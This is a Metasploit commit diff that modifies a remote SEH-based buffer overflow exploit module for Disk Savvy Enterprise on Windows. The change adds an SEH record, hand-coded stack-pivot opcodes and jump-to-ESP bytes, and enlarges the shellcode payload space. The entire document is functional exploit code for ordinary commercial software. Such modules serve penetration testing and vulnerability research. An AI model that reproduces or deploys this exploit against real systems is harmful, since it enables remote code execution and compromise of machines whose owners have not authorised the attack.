Modified Exploit

jrobles-r7 · jrobles-r7 · commit d02bf40d691a · 2018-02-20T15:35:43.000-06:00
Remove NOPS that weren't needed and freed up space for a larger payload. [ticket: rapid7#9561]
diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
 
   def initialize(info = {})
     super(update_info(info,
@@ -30,7 +31,7 @@ def initialize(info = {})
       'Payload'        =>
         {
           'BadChars'   => "\x00\x02\x0a\x0d\xf8",
-          'Space'      => 355
+          'Space'      => 800
         },
       'Targets'        =>
         [
@@ -50,16 +51,16 @@ def initialize(info = {})
   end
 
   def exploit
+    seh = generate_seh_record(target.ret)
     connect
 
     buffer = make_nops(target['Offset'])
-    buffer << "\x90\x09\xEB\x05"
-    buffer << [target.ret].pack('V')
-    buffer << make_nops(10)
-    buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,100").encode_string * 20
-    buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp esp").encode_string
-    buffer << make_nops(441)
+    buffer << seh
+    buffer << "\x83\xc4\x7f" * 13   #ADD esp,7fh
+    buffer << "\x83\xc4\x21"        #ADD esp,21h
+    buffer << "\xff\xe4"            #JMP esp
     buffer << payload.encoded
+    buffer << Rex::Text.rand_text_alphanumeric(1)
 
     header = "\x75\x19\xba\xab"
     header << "\x03\x00\x00\x00"
